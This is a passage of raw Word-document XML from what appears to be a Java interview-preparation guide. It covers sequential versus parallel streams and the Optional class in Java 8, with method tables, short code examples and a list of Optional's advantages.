      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="21CDE7F7" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DC19A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75621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the order of elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E3CE9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guarantee the order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="38E0C8C6" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7348B7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7BF77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operations, small data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="175F2A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computations, large data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="52E2E66B" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22832D0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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D62F18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overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D8CA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overhead due to parallelization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65AE85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Parallel Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7357230F"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arge datasets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or computationally expensive operations where the benefits of parallel processing outweigh the overhead of splitting the data and managing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E8E2B8"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parallel streams for smaller datasets or tasks that don't require much computation, as the overhead might actually degrade performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E98D1"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B0C82A">
          <v:rect id="_x0000_i1700" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F495A0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C0F78B0"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sequentially or in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895CFFA"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utilizes multi-threading to process data concurrently, offering better performance for large-scale computations, but with added complexity and potential overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6FA521" w14:textId="72F4AEF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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66162279"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2" w:name="_Toc197867456"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Optional class in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w14:paraId="090574F3" w14:textId="4D6B1854" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1"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ptional in Java 8?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316430D2"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is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduced in Java 8, used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>represent the presence or absence of a value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It helps you avoid </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null pointer exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and makes the code more readable and null-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1B80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 a box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED2F1F"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ox may </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contain a value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75357E9E"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y be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no value inside = null equivalent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204762BF"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05C3D">
          <v:rect id="_x0000_i1702" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA3E9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was Optional introduced?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444FB12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duce the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>risk of NullPointerException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and encourage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practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B23E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADBB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person.getName(); // Might be null -&gt; NPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00C72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do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4B5C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person.getNameOptional();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D6264"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8544F6D"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EF5206">
          <v:rect id="_x0000_i1703" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577CBCE"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create an Optional?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD29B6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1 = Optional.of("Java");         // Non-null value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA11BD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2 = Optional.empty();            // No value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B58A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3 = Optional.ofNullable(null);   // Accepts nulls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77912AB2"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A7D0E">
          <v:rect id="_x0000_i1704" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FE8F3"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178"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="00D795EC" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E38768A"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72851D2"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B422C8" w:rsidRPr="00CE4B95" w14:paraId="65F47B2F" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="699F2DC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Present()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AAC7AE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value is present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="2E5B9C9E" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F26B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Present(Consumer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B43AD4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action if value is present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="21971A26" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B941DB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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C4581F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value (throws exception if empty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="11012E55" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD2F99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 other)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BE3B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value if present, else returns default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="2489D5E3" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755B2CDF"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Get(Supplier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45D5577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ke orElse, but lazily evaluated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3DD05850" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56DF34E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hrow()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFCD6F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NoSuchElementException if no value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="42048438" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CD8DBF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Function)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="267A6F1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value if present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="27889E95" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4251416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Function)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42468C7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map but avoids nested Optionals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="576AFC86" w14:textId="77777777" w:rsidTr="00527FB1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F3887A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Predicate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B9F7F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Optional if value matches predicate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E667E4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C69DD">
          <v:rect id="_x0000_i1705" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06CB85"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8BA9ED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7A6C3268" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D6C8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ame: " + n));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA8980" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D9A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finalName = name.orElse("Default Name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E4B6A0" w14:textId="77777777" w:rsidR="00527FB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00527FB1" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683EE6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inalName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5014F69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460CB8">
          <v:rect id="_x0000_i1706" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F445B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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C850DC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EmailByUsername(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676EFCC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siddhant")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E4954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sid@example.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F41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B7DFA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empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C504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71881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usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367FC13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email = getEmailByUsername("siddhant").orElse("No email found");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2323A1"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2A29E">
          <v:rect id="_x0000_i1707" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AC57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F16F265"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 helps avoid null and null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E106A"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motes functional-style coding (map, filter, flatMap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A898EF"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isely – </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t overuse in DTOs or method parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FFEE4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real-time examples from your project or interview-style scenarios!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2DC22" w14:textId="2553564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08" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFE40A" w14:textId="751A973E" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6F" w:rsidP="00EE1B6F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Toc197867457"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of using Optional class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="54282519" w14:textId="6ADDA2E4" w:rsidR="00EE1B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B6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 Class in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232419A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lt;T&gt; is a container object introduced in Java 8 to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handle null values gracefull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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF91940"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0E7B5A">
          <v:rect id="_x0000_i1709" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A7037"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voids NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF97C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returning or accepting null, you return an Optional which clearly conveys that a value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>might be absent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F07D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6B4D6257"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2C29CE1"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F072F">
          <v:rect id="_x0000_i1710" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0929F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mproves Code Readability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B0A53"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makes your intention clear — a value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>may or may not be present</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7CAB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User&gt; user = findUserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58FA5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lear that user might be empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7289B5D9"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36798">
          <v:rect id="_x0000_i1711" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28122D89"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ncourages Functional Style Programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69A33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methods like .map(), .filter(), .flatMap(), etc., to process the value if present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA7ECB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upperName = name.map(String::toUpperCase);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54302F78"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0A2408">
          <v:rect id="_x0000_i1712" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A016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4. Provides Better Null Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A33F0E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like isPresent(), ifPresent(), orElse(), orElseGet() and orElseThrow() help you handle optional values safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AEBC9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Name.orElse("Default");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86D14A"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543BD">
          <v:rect id="_x0000_i1713" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17E031"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Avoids Explicit Null Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165DDE86"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bj != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E6EE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26184E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34B53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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17C46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Obj.ifPresent(o -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6BF0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E6C041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E643FE"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D474D0">
          <v:rect id="_x0000_i1714" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB4C5A"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Used in Return Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3CF3E2"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return Optional&lt;T&gt; instead of null from methods, making API contracts clearer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365011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Employee&gt; findEmployee(String id) {</w:t>
      </w:r>
    </w:p>
